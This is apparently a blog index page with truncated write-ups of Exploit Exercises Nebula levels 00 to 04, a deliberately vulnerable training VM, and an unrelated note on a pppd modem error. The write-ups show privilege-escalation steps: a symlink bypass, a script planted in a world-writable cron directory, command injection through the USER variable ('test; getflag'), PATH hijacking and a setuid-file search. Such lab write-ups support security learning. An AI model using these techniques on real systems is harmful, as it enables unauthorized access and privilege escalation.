Exploit Exercises Nebula 5: Level 04 Write Up

Exploit Exercises Nebula 5: Level 04 Write Up

Level: https://exploit-exercises.com/nebula/level04/ This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :) To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04. We can bypass this check by creating a symbolic link. ln -s /home/flag04/token /home/level04/foo /home/flag04 /home/level04/foo And you’ll see the token in the output.

Exploit Exercises Nebula 5: Level 03 Write Up

Exploit Exercises Nebula 5: Level 03 Write Up

Level: https://exploit-exercises.com/nebula/level03/ Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03. ls -la /home/flag03 writeable.sh executes bash -x for every file in writeable.d writeable.d is world writeable so place our own file. echo “getflag > /home/flag03/flag” > /home/flag03/writeable.d/test chmod +x /home/flag03/writeable.d/test Wait…

Read More Read More

Exploit Exercises Nebula 5: Level 02 Write Up

Exploit Exercises Nebula 5: Level 02 Write Up

Level: https://exploit-exercises.com/nebula/level02/ There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02. “`c++ asprintf(&buffer, “/bin/echo %s is cool”, getenv(“USER”)); //command injection printf(“about to call system(\”%s\”)\n”, buffer); system(buffer); The code has a command injection vulnerability. We can exploit this by setting the environmental variable `USER` to `test; getflag` “`bash…

Read More Read More

Exploit Exercises Nebula 5: Level 01 Write Up

Exploit Exercises Nebula 5: Level 01 Write Up

Level: https://exploit-exercises.com/nebula/level01/ There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. ls /home/flag01 stat /home/flag01/flag01 /home/flag01/flag01 has the setuid bit set so it will run as the owner (flag01). “`c++ system(“/usr/bin/env echo and now what?”); `/usr/bin/env` tells the system to search for `echo` in **our** PATH not…

Read More Read More

Exploit Exercises Nebula 5: Level 00 Write Up

Exploit Exercises Nebula 5: Level 00 Write Up

Start: https://exploit-exercises.com/nebula/ Level: https://exploit-exercises.com/nebula/level00/ Download: https://exploit-exercises.com/download/ SHA256: da2e6ba445b630fd07f0bb0d2866491fc898f0429d9d380e1ebbf24f3e407d3f I used Linux/Ubuntu setting in VMWare. This level requires you to find a Set User ID program that will run as the “flag00” account. nebula login: level00 Password: level00 find / -type f -user flag00 2>/dev/null #find files owned by flag00 (ignoring errors) stat /rofs/bin/…/flag00 #check the obvious file if it has setuid /rofs/bin/…/flag00 #run it getflag #get our flag You have successfully executed getflag on a target account. -rwsr-x— The s…

Read More Read More

pppd:Couldn’t get channel number: Transport endpoint is not connected

pppd:Couldn’t get channel number: Transport endpoint is not connected

Modem: iiNet TG-1 (Which I think is a branded NetComm Wireless NB16WV-02) I was having troubles connecting to FTTN and noticed these log entries. Jan 1 00:03:32 daemon notice syslog: PPP: Start to connect … Jan 1 00:03:55 daemon err syslog: pppd:Couldn’t get channel number: Transport endpoint is not connected Jan 1 00:03:55 daemon notice syslog: pppd:Couldn’t reset tty to normal line discipline: Inappropriate ioctl for device Jan 1 00:03:55 daemon notice syslog: pppd:Doing disconnect Solution: Was a line fault,…

Read More Read More